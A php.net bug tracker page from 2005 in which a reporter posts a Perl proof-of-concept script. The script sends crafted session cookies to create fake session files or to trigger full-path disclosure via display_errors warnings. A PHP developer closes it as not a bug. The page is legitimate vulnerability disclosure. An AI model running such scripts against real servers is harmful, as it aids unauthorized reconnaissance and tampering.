php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #35429 problem with sessions..
Submitted: 2005-11-27 21:22 UTC Modified: 2005-11-27 23:50 UTC
From: sienicki dot kamil at gmail dot com Assigned:
Status: Not a bug Package: Unknown/Other Function
PHP Version: 4.4.1 OS: Linux/Windows (all?)
Private report: No CVE-ID: None
View Add Comment Developer Edit
 [2005-11-27 21:22 UTC] sienicki dot kamil at gmail dot com 
Description:
------------
I write simple exploit to show this vuln.. (i think..)
problem with sessions..

--
#!/usr/bin/perl
#
# PHP vulnerabilities..
# 
# Exploit (Proof Of Concept ?) by Kamil 'K3' Sienicki
# 
# I found two possibility of use that bug.. (maybe more)
# 
# display_errors must be On
#
use IO::Socket;

if(@ARGV < 3)
 {

  print "\n";
  print "PHP Exploit (POC)\n";
  print " by Kamil 'K3' Sienicki\n\n";
  print "1. Create fake session file (sess_fake) in directory (default /tmp). \n";
  print "2. Full path disclosure.\n\n";

  print "Usage: ./php_bug.pl [host] [address] [type of attack (1 or 2)]\n\n";

exit;

 }

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ARGV[0]", PeerPort => "80" ) || die "[-] Connect failed! \r\n";

if($ARGV[2] == 1)
 {
  print "\n";
  print "PHP Exploit (POC)\n";
  print " by Kamil 'K3' Sienicki\n\n";
  print "Name of session (default PHPSESSID): ";
  $sess = <stdin>;
  print "Name of fake sess_file: ";
  $fake = <stdin>;
  chomp($sess,$fake);
  print $socket "GET $ARGV[1] HTTP/1.0\n";
  print $socket "Cookie: $sess=$fake\n\n";
  print "'$fake' fake file was created.. \n";
 } elsif ($ARGV[2] == 2)
 {
   print "\n";
   print "PHP Exploit (POC)\n";
   print " by Kamil 'K3' Sienicki\n\n";
   print "Name of session (default PHPSESSID): ";
   $sess = <stdin>;
   chomp($sess); 
   print $socket "GET $ARGV[1] HTTP/1.0\n";
   print $socket "Cookie: $sess=@\n\n";
   while ($answer = <$socket>)
    {
     if ($answer =~ m/^...Warning/) 
      { 
        print $answer."\n";
      }
    }

}

--

Reproduce code:
---------------
<?

session_start();

?>


Expected result:
----------------
Warning: session_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /htdocs/sess.php on line 3

Warning: Unknown(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in Unknown on line 0

Warning: Unknown(): Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/tmp) in Unknown on line 0

Full path disclosure..

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2005-11-27 21:29 UTC] tony2001@php.net 
What exactly are you trying to exploit?
 [2005-11-27 23:46 UTC] sienicki dot kamil at gmail dot com 
I think it is a small bug when i send '@' as a cookie name session and php show full path to script.. when display errors is on
 [2005-11-27 23:50 UTC] tony2001@php.net 
Yeah, you can see full path to the script in 99.99999% of error messages.
No bug here.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Mon May 06 03:01:35 2024 UTC